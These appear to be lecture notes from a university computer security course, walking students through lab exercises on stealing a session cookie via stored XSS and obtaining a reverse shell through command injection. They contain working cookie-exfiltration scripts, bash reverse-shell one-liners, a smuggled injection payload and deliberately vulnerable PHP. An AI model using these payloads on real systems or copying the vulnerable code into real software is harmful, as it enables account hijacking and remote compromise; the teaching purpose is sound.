CS338 Computer Security
Friday, 10 November 2023

+ Any favorite discoveries yet?

+ Stealing Alice's FDF session key

- Part 1: Eve on Kali
    - Go to FDF
    - Login as Eve
    - Add a post containing
        <script>document.cookie.split(';').forEach(function(e) {
            let parts = e.split('=');
            let name = parts[0].trim();
            alert(name + ': ' + parts[1]);
        });</script>

- Part 2: Alice, on your host OS
    - Go to FDF using Safari or Firefox
        (Chrome is sneaky by default--stay tuned for more on that)
    - Look at cookies
    - Login as Alice
    - Look at cookies
    - Look at Eve's post
    - Whoa!

- Part 3: Eve
    - cd to some convenient directory and launch a quick-and-dirty web server

        python3 -m http.server 8000

    - in your browser, add a new post containing:
        <script>document.cookie.split(';').forEach(function(e) {
            let parts = e.split('=');
            let name = parts[0].trim();
            if (name === 'session') {
                fetch('http://KALI_IP:8000/?s=' + parts[1], {method:'get'}).catch(function(error) {});
            }
        });</script>

- Part 4: Alice
    - Reload FDF and look at Eve's new post

- Part 5: Eve
    - In the terminal tab where your http server is running, copy the session key
        from the log entry that just appeared
    - In your browser, logout of FDF but leave the tab open
    - Edit the cookies, and add a cookie named "session" with the value you just
        copied from your terminal
    - Reload the page
    - Congratulations, Eve!

- Part 6: defenses
    - Try Chrome, login as Alice, and look at Eve's second post 
        Does the http server in the Kali terminal notice? What does the inspector
        in Chrome tell you?

    - The HttpOnly Set-Cookie flag


+ Reverse shells
- nc -l reminder

- This crazy thing:

    bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'

- How do you get your victim machine to execute that crazy thing?

(Note that this thing doesn't work on Metasploitable 2, because it's too darned old. So to play
with it, we'll switch to making Kali the victim and your main OS the attacker.)

- Steps
    - On Kali (victim), launch Apache web server  (sudo systemctl start apache2)
    - On Kali, put the bad PHP code shown below in /var/www/html/host.php. You'll need sudo for this,
        since /var/www/html is owned by root.
    - In your browser on your home OS (attacker), go to http://KALI_IP/host.php
        Enter carleton.edu and hit Submit. What do you see?
        Enter carleton.edu;whoami and hit Submit. What do you see?
        Enter carleton.edu;cat /etc/passwd and hit Submit. What do you see?
    - On the attacker, launch this:

        nc -l -p 4444

    - On the attacker's browser in host.php, enter this (of course filling in your main OS's
       IP address that faces Kali):

        carleton.edu;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
    
    - In the nc terminal on the attacker, you should now see a kali prompt. Go nuts.

=====
Here's some very dangerous PHP for your amusement. (This is vulnerable to "command injection".)

<!DOCTYPE html>
<html>
  <head>
    <title>Host info</title>
  </head>
  <body>
    <form method="get">
      <label for="host">Host name</label>
      <input type="text" name="host" value="<?php echo $_REQUEST['host'];?>">
      <input type="submit">
    </form>
    <div style="margin-top:30pt">
      <code><pre><?php
         if (isset($_REQUEST["host"])) {
           $host = $_REQUEST["host"];
           system("host $host");
         }
      ?></pre></code>
    </div>
  </body>
</html>



jeffondich.com;bash -c 'bash -i >& /dev/tcp/172.16.86.1/4444 0>&1'

<script>document.cookie.split(';').forEach(function(e) {
    let parts = e.split('=');
    let name = parts[0].trim();
    if (name === 'session') {
        fetch('http://172.16.41.134:8000/?s=' + parts[1], {method:'get'}).catch(function(error) {});
    }
});</script>